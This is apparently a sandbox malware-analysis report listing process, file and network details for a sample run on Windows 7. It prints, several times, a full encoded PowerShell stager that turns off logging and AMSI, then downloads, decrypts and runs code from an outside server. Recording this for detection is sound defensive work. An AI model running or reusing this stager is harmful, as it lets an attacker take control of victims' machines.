Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 12, 2024, 9:41 a.m. | Aug. 12, 2024, 9:43 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
792
-
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= |
cmdline | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= |
host | 193.117.208.148 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWA